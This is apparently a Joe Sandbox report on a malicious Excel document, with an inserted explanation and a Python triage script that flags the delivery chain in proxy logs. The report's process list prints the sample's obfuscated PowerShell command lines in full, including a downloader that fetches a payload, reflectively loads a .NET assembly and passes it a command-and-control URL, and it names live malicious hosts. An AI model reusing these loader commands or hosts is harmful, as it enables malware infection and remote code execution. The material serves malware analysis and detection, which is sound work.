                                                                      Data Ascii: "LcKUzRuqkKRKGUG = "cPABKkWimPpPhJL"LWbLLZWAOfdTpLh = "oBjhtKzktvqNrob"WWAUWqtGIOpbiPU = "GWWuLNcKaBhthKa"kGliqLU
                                                                      Nov 28, 2024 07:28:17.865030050 CET | 1236 | IN | Data Raw: 00 74 00 67 00 6b 00 4e 00 6b 00 4c 00 57 00 4c 00 55 00 48 00 47 00 68 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 4c 00 6f 00 66 00 70 00 4b 00 74 00 57 00 43 00 57 00 4c 00 55 00 54 00 7a 00 41 00 63 00 20 00 3d 00 20 00 22 00 55 00 57 00 65 00 4e
                                                                      Data Ascii: tgkNkLWLUHGhi"LofpKtWCWLUTzAc = "UWeNKZiOLupxuzW"KiIloRKiRcjTPPc = "GgiiCLoKLKLBWWe"GhLoisJudNgkOkl = "zxeqIjOOmx
                                                                      Nov 28, 2024 07:28:17.865045071 CET | 1236 | IN | Data Raw: 00 52 00 57 00 41 00 7a 00 6b 00 72 00 7a 00 57 00 62 00 20 00 3d 00 20 00 22 00 68 00 5a 00 7a 00 55 00 47 00 47 00 4b 00 55 00 5a 00 6b 00 68 00 69 00 6e 00 53 00 4c 00 22 00 0d 00 0a 00 69 00 4c 00 4c 00 4a 00 47 00 4c 00 70 00 4c 00 62 00 4c
                                                                      Data Ascii: RWAzkrzWb = "hZzUGGKUZkhinSL"iLLJGLpLbLisOkd = "LzeWmWzPLifKdtb"cLWUZtricliniarchaUxoexjlo = "dUgnkLmHmcLzSjd"pWPcG
                                                                      Nov 28, 2024 07:28:17.865056038 CET | 1236 | IN | Data Raw: 00 66 00 57 00 50 00 72 00 42 00 68 00 47 00 74 00 55 00 20 00 3d 00 20 00 22 00 6a 00 69 00 42 00 6c 00 4c 00 4c 00 5a 00 55 00 41 00 75 00 47 00 54 00 69 00 7a 00 47 00 22 00 0d 00 0a 00 6f 00 51 00 4b 00 55 00 47 00 4e 00 47 00 68 00 41 00 4b
                                                                      Data Ascii: fWPrBhGtU = "jiBlLLZUAuGTizG"oQKUGNGhAKekWhL = "chGcLfexLAAiKqv"imIiWiiWsdCkbNU = "qbLKGKLPNZpnbbR"WnKGlQhzcTxkouP
                                                                      Nov 28, 2024 07:28:17.984885931 CET | 1236 | IN | Data Raw: 00 57 00 6f 00 69 00 4c 00 22 00 0d 00 0a 00 62 00 63 00 76 00 41 00 66 00 72 00 73 00 57 00 62 00 63 00 66 00 55 00 6c 00 6b 00 5a 00 20 00 3d 00 20 00 22 00 73 00 4c 00 47 00 4e 00 6b 00 67 00 63 00 54 00 70 00 69 00 62 00 69 00 70 00 55 00 43
                                                                      Data Ascii: WoiL"bcvAfrsWbcfUlkZ = "sLGNkgcTpibipUC"LkjAumQrodmeisN = "ZitrbWmfLnWkAQq"ZmGuupRiehPkGPU = "IWKPPobxqKZOOCL"d


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.22 | 49163 | 152.231.117.86 | 443 | 3620 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-28 06:28:03 UTC | 403 | OUT | GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: ljg.cl
                                                                      Connection: Keep-Alive
                                                                      2024-11-28 06:28:04 UTC | 531 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Thu, 28 Nov 2024 06:28:04 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 72
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://172.245.123.29/1343/erg/seemebestthings.hta
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
                                                                      2024-11-28 06:28:04 UTC | 72 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 2f 31 33 34 33 2f 65 72 67 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 2e 68 74 61
                                                                      Data Ascii: Found. Redirecting to http://172.245.123.29/1343/erg/seemebestthings.hta
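Read together, the sessions above give the delivery chain: EXCEL.EXE requests a short link on ljg.cl, which answers 302 with a Location on a bare-IP host for seemebestthings.hta; mshta.exe fetches that HTA (Content-Type application/hta); then powershell.exe fetches a file with a .tIF name that the server labels image/tiff, but whose body starts with the UTF-16LE byte-order mark ff fe and decodes to lines of `name = "..."` assignments, i.e. script text, where a TIFF would begin with `II*\0` or `MM\0*`. Each of those is a cheap, high-signal check on proxy or sandbox records: an Office process redirected to a script payload, a script host pulling from a raw IP, mshta.exe fetching a remote HTA, and a declared image type whose magic bytes are missing.

The triage pass below is an added example for this page, not part of the Joe Sandbox report or of the sample. The three records are constructed from the sessions shown (the record fields, the rule set and the process lists are assumptions about what a proxy log carries; the body prefixes are the first bytes in the Data Raw lines).

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List

# File signatures for image types a downloader is likely to hide a script behind.
MAGIC = {
    "image/tiff": (b"II*\x00", b"MM\x00*"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}   # assumption: the LOLBins of interest
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}                       # assumption
SCRIPT_EXT = re.compile(r"\.(hta|vbs|vbe|js|jse|wsf|ps1)(\?|$)", re.I)
ASSIGN_LINE = re.compile(r'^\s*[A-Za-z_]\w*\s*=\s*"', re.M)   # VBScript/JScript-style  name = "..."


@dataclass
class HttpRecord:
    """One request/response pair as a proxy or sandbox would log it (constructed field set)."""
    process: str
    host: str
    url: str
    status: int
    content_type: str = ""
    location: str = ""   # Location header of a redirect, if any
    body: bytes = b""    # first bytes of the response body


def is_bare_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def declared_type_mismatch(content_type: str, body: bytes) -> bool:
    """True when Content-Type names a format whose magic bytes are absent from the body."""
    mime = content_type.split(";")[0].strip().lower()
    magics = MAGIC.get(mime)
    return bool(magics and body) and not body.startswith(magics)


def body_is_script_text(body: bytes) -> bool:
    """Decode a BOM-prefixed UTF-16 or plain ASCII body and look for script rather than image content."""
    if body.startswith(b"\xff\xfe"):
        text = body[2:].decode("utf-16-le", errors="replace")
    elif body.startswith(b"\xfe\xff"):
        text = body[2:].decode("utf-16-be", errors="replace")
    else:
        try:
            text = body.decode("ascii")
        except UnicodeDecodeError:
            return False
    return "<script" in text.lower() or ASSIGN_LINE.search(text) is not None


def triage(rec: HttpRecord) -> List[str]:
    proc = rec.process.rsplit("\\", 1)[-1].lower()
    findings = []
    if proc in OFFICE_APPS and rec.status in (301, 302, 303, 307, 308) and SCRIPT_EXT.search(rec.location):
        findings.append("office-app redirected to script payload")
    if proc in SCRIPT_HOSTS and is_bare_ip(rec.host):
        findings.append("script host fetching from bare IP")
    if proc == "mshta.exe" and (rec.content_type.lower().startswith("application/hta") or SCRIPT_EXT.search(rec.url)):
        findings.append("mshta.exe fetched remote HTA")
    if declared_type_mismatch(rec.content_type, rec.body):
        findings.append("declared %s but magic bytes do not match" % rec.content_type.split(";")[0].strip())
    if proc in SCRIPT_HOSTS and body_is_script_text(rec.body):
        findings.append("response body is script text")
    return findings


def triage_all(records: List[HttpRecord]) -> Dict[str, List[str]]:
    """Map process basename to its findings so the chain reads in order."""
    return {r.process.rsplit("\\", 1)[-1].lower(): triage(r) for r in records}


# Constructed from the sessions in this report; bodies are the first bytes shown in the Data Raw lines.
SESSIONS = [
    HttpRecord(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "ljg.cl",
               "/G5dF?&rank=uttermost&fan=decorous&barracks=drunk", 302, "text/plain; charset=utf-8",
               location="http://172.245.123.29/1343/erg/seemebestthings.hta"),
    HttpRecord(r"C:\Windows\System32\mshta.exe", "172.245.123.29",
               "/1343/erg/seemebestthings.hta", 206, "application/hta",
               body=b"<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3E"),
    HttpRecord(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "172.245.123.29",
               "/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF", 200, "image/tiff",
               body=b"\xff\xfe" + '\r\n\r\nKLcvKWZLLBGBgiL = "KWtricliniarchaLjxmqAcAUar"\r\n'.encode("utf-16-le")),
]

if __name__ == "__main__":
    for proc, findings in triage_all(SESSIONS).items():
        print(proc, "->", "; ".join(findings) or "nothing flagged")
```

The magic-byte check is deliberately conservative: it only fires for types it knows, and never on an empty body, so a `text/plain` redirect or an `application/hta` response (which has no magic) cannot trip it; the script-text check is what catches the .tIF body, because the UTF-16LE BOM is itself a strong hint that the "image" is a text file.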


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.22 | 49165 | 152.231.117.86 | 443 | 3948 | C:\Windows\System32\mshta.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-28 06:28:09 UTC | 427 | OUT | GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: fr-FR
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: ljg.cl
                                                                      Connection: Keep-Alive
2024-11-28 06:28:09 UTC | 531 | IN | HTTP/1.1 302 Found
                                                                      Server: openresty
                                                                      Date: Thu, 28 Nov 2024 06:28:09 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 72
                                                                      Connection: close
                                                                      X-DNS-Prefetch-Control: off
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Location: http://172.245.123.29/1343/erg/seemebestthings.hta
                                                                      Vary: Accept
                                                                      Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                      X-Served-By: ljg.cl
2024-11-28 06:28:09 UTC | 72 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 32 39 2f 31 33 34 33 2f 65 72 67 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 2e 68 74 61
                                                                      Data Ascii: Found. Redirecting to http://172.245.123.29/1343/erg/seemebestthings.hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49168 | 193.30.119.205 | 443 | 2036 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-28 06:28:27 UTC | 211 | OUT | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                      Host: 3105.filemail.com
                                                                      Connection: Keep-Alive
2024-11-28 06:28:28 UTC | 234 | IN | HTTP/1.1 500 Internal Server Error
                                                                      Cache-Control: no-cache,no-store
                                                                      Pragma: no-cache
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Expires: -1
                                                                      Date: Thu, 28 Nov 2024 06:28:27 GMT
                                                                      Connection: close
2024-11-28 06:28:28 UTC | 307 | IN | Data Raw: 31 32 63 0d 0a 7b 22 76 61 6c 69 64 61 74 69 6f 6e 65 72 72 6f 72 73 22 3a 5b 7b 22 50 72 6f 70 65 72 74 79 4e 61 6d 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 22 2c 22 45 72 72 6f 72 43 6f 64 65 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 74 72 61 6e 73 66 65 72 20 69 73 20 65 78 70 69 72 65 64 22 7d 5d 2c 22 72 65 73 70 6f 6e 73 65 73 74 61 74 75 73 22 3a 22 54 72 61 6e 73 66 65 72 45 78 70 69 72 65 64 22 2c 22 65 72 72 6f 72 69 64 22 3a 22 37 32 62 61 39 33 36 35 2d 30 63 36 35 2d 34 34 32 32 2d 38 63 30 39 2d 38 64 61 39 66 37 32 33 62 36 33 36 22 2c 22 65 72 72 6f 72 6d 65 73 73 61 67 65 22 3a 22 74 72 61 6e 73 66 65 72 69 64 20 2d 2d 3e 20 5b 54 72 61 6e 73 66 65 72 45 78
                                                                      Data Ascii: 12c{"validationerrors":[{"PropertyName":"transferid","ErrorCode":"TransferExpired","ErrorMessage":"This transfer is expired"}],"responsestatus":"TransferExpired","errorid":"72ba9365-0c65-4422-8c09-8da9f723b636","errormessage":"transferid --> [TransferEx
2024-11-28 06:28:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Target ID:0
                                                                      Start time:01:27:06
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13f340000
                                                                      File size:28'253'536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:01:28:04
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\mshta.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                      Imagebase:0x13fb10000
                                                                      File size:13'824 bytes
                                                                      MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:01:28:11
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
                                                                      Imagebase:0x49d40000
                                                                      File size:345'088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:01:28:11
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:01:28:14
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
                                                                      Imagebase:0x13f9e0000
                                                                      File size:2'758'280 bytes
                                                                      MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:01:28:14
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"
                                                                      Imagebase:0x13f530000
                                                                      File size:52'744 bytes
                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:01:28:20
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
                                                                      Imagebase:0xff450000
                                                                      File size:168'960 bytes
                                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:01:28:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:01:28:23
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Call Graph

                                                                      • Entrypoint
                                                                      • Decryption Function
                                                                      • Executed
                                                                      • Not Executed
                                                                      callgraph 1 Error: Graph is empty

                                                                      Module: Sheet1

Declaration
Line | Content
1 | Attribute VB_Name = "Sheet1"
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = False
8 | Attribute VB_Customizable = True

                                                                      Module: Sheet2

Declaration
Line | Content
1 | Attribute VB_Name = "Sheet2"
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = False
8 | Attribute VB_Customizable = True

                                                                      Module: Sheet3

Declaration
Line | Content
1 | Attribute VB_Name = "Sheet3"
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = False
8 | Attribute VB_Customizable = True

                                                                      Module: ThisWorkbook

Declaration
Line | Content
1 | Attribute VB_Name = "ThisWorkbook"
2 | Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = False
8 | Attribute VB_Customizable = True

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:

                                                                        Execution Graph

                                                                        Execution Coverage: 4.4%
                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 4
                                                                        Total number of Limit Nodes: 0
                                                                        execution_graph 3636 7fe89997c25 3637 7fe89997c33 3636->3637 3638 7fe89997bd3 URLDownloadToFileW 3637->3638 3639 7fe89997c00 3637->3639 3638->3639

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadFile
                                                                        • String ID:
                                                                        • API String ID: 1407266417-0
                                                                        • Opcode ID: 879728d0cbfe6da573771bdd2793b6597b1a3b7e0c93513666902692d11056d7
                                                                        • Instruction ID: 0fad5e4383d5fdc216e536ed09c79d309fae6a9213bcf8d9fa7efc9228c376e9
                                                                        • Opcode Fuzzy Hash: 879728d0cbfe6da573771bdd2793b6597b1a3b7e0c93513666902692d11056d7
                                                                        • Instruction Fuzzy Hash: 9E319F31918A5C9FDB58EF5CD885BA9B7E1FB59321F00822ED05ED3661DB70B8068B81

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: V
                                                                        • API String ID: 0-1342839628
                                                                        • Opcode ID: 9d60b80d690f96ad654d1a059c9020c3a9a1f26ec69a460323e402779ee46eb9
                                                                        • Instruction ID: 05df26ce201530af25db1e1b0d1f65da217640749fc4eda23d6bf8aebda8e676
                                                                        • Opcode Fuzzy Hash: 9d60b80d690f96ad654d1a059c9020c3a9a1f26ec69a460323e402779ee46eb9
                                                                        • Instruction Fuzzy Hash: 7BD1E23180E7C91FD35797389C146A67FA4EF87260F0911EBD48DCB0A3D619AD5AC3A2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadFile
                                                                        • String ID:
                                                                        • API String ID: 1407266417-0
                                                                        • Opcode ID: 3b2b4d0d41b9374ce89ee182d845af46cba2b3cbd07fee8e43d11a0effa7f86f
                                                                        • Instruction ID: 6f84947ac8fb5dc9d1977e392bb3539af670bb67ee2fccd97c34dfdfbf57d55f
                                                                        • Opcode Fuzzy Hash: 3b2b4d0d41b9374ce89ee182d845af46cba2b3cbd07fee8e43d11a0effa7f86f
                                                                        • Instruction Fuzzy Hash: F241F57080DB889FDB1ADB589C447AABBF0FB56321F04426FD089D3562DB646806C781

                                                                        Control-flow Graph

                                                                        Memory Dump Source
